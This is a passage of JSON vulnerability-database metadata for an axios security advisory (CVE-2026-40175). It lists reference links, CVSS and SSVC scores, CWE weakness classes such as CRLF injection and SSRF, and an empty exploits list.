:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/"}],"url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c"},{"reference_url":"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/"}],"url":"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1"},{"reference_url":"https://github.com/axios/axios/pull/10660","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/"}],"url":"https://github.com/axios/axios/pull/10660"},{"reference_url":"https://github.com/axios/axios/pull/10660#issuecomment-4224168081","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/10660#issuecomment-4224168081"},{"reference_url":"https://github.com/axios/axios/pull/10688","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/"}],"url":"https://github.com/axios/axios/pull/10688"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.31.0","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.31.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.15.0","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.15.0"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40175","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40175"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2457432","reference_id":"2457432","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2457432"},{"reference_url":"https://github.com/advisories/GHSA-fvcv-3m26-pcqx","reference_id":"GHSA-fvcv-3m26-pcqx","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fvcv-3m26-pcqx"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10104","reference_id":"RHSA-2026:10104","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10104"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10153","reference_id":"RHSA-2026:10153","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10153"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10172","reference_id":"RHSA-2026:10172","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10172"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10175","reference_id":"RHSA-2026:10175","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10175"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:11414","reference_id":"RHSA-2026:11414","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:11414"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13542","reference_id":"RHSA-2026:13542","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13542"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13548","reference_id":"RHSA-2026:13548","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13548"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13571","reference_id":"RHSA-2026:13571","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13571"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13826","reference_id":"RHSA-2026:13826","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13826"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:14774","reference_id":"RHSA-2026:14774","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:14774"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:14937","reference_id":"RHSA-2026:14937","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:14937"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:15091","reference_id":"RHSA-2026:15091","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:15091"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:16874","reference_id":"RHSA-2026:16874","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:16874"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:17657","reference_id":"RHSA-2026:17657","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:17657"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:17699","reference_id":"RHSA-2026:17699","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:17699"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8483","reference_id":"RHSA-2026:8483","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8483"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8484","reference_id":"RHSA-2026:8484","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8484"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8490","reference_id":"RHSA-2026:8490","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8490"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8491","reference_id":"RHSA-2026:8491","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8491"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8493","reference_id":"RHSA-2026:8493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8499","reference_id":"RHSA-2026:8499","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8499"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8500","reference_id":"RHSA-2026:8500","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8500"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8501","reference_id":"RHSA-2026:8501","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8501"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9742","reference_id":"RHSA-2026:9742","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9742"}],"weaknesses":[{"cwe_id":113,"name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","description":"The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers."},{"cwe_id":444,"name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","description":"The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination."},{"cwe_id":918,"name":"Server-Side Request Forgery (SSRF)","description":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."},{"cwe_id":915,"name":"Improperly Controlled Modification of Dynamically-Determined Object Attributes","description":"The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified."},{"cwe_id":937,"name":"OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013."},{"cwe_id":1035,"name":"OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017."}],"exploits":[],"severity_range_score":"4.0 - 10.0","exploitability":"0.5","weighted_severity":"9.0","risk_score":4.5,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ek49-tuj4-t3ap"}